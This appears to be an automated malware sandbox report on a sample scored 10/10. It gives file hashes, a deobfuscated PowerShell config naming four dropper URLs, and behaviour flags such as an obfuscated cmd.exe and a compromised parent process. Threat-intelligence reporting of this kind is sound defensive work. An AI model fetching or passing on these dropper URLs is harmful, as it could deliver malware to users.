General

  • Target

    580f0c6436b66bf1d241b60b377c3e48_JaffaCakes118

  • Size

    105KB

  • Sample

    240519-cnywxadc3v

  • MD5

    580f0c6436b66bf1d241b60b377c3e48

  • SHA1

    199ef855f5657e16b781e6ab7ce5b6adfbc0c9aa

  • SHA256

    65df22d8324ac4ec988abbc319b2dcbdbe7da062b2ad006dde21270c8ba11c46

  • SHA512

    aa15696dfd9dcb1bcc65ba4014925f5b8d438930a88594021ce8ecd5d2307b3becf69975a1e8e147b29f1f93b5c49157a3ad42251c3df647ad443ff71cd5e286

  • SSDEEP

    3072:IMIqkaybokSjZTZjU+0cK05KlwMZ5jtG4zL:IMHVyb3CZ535KnpG4zL

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://rickzandvoort.nl/iAsylSE/

exe.dropper

http://littlepicture.de/fjsN/

exe.dropper

http://di2media.nl/downloader/G4h8/

exe.dropper

http://getzendiner.com/kB3RzYg/

Targets

    • Target

      XY-7751895

    • Size

      194KB

    • MD5

      4f09e96c4b23820b6d3dfdd2381b8a1e

    • SHA1

      c18e1141e40e6561b8b13a9c59f9afb480f190c1

    • SHA256

      ea036a4e07795cc164463e195031d10c130a6ee7176aee37002890c913c1f5dc

    • SHA512

      d0f4a87010534fa38523ad1f82ca54cfeacaf07f292d1d1b2c90f5b6197b3f1199414153c80056fead62c3511ff385786415d8384028219f6ba385e2c877c144

    • SSDEEP

      3072:gNYW/Ok6ZOZykI27dRbiJp9XOTXp3naXCLeTWk15YeZc721h:a2k6ZOZt7dRbi8TXp3uCyTZ/pZc721h

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.

MITRE ATT&CK Enterprise v15

Tasks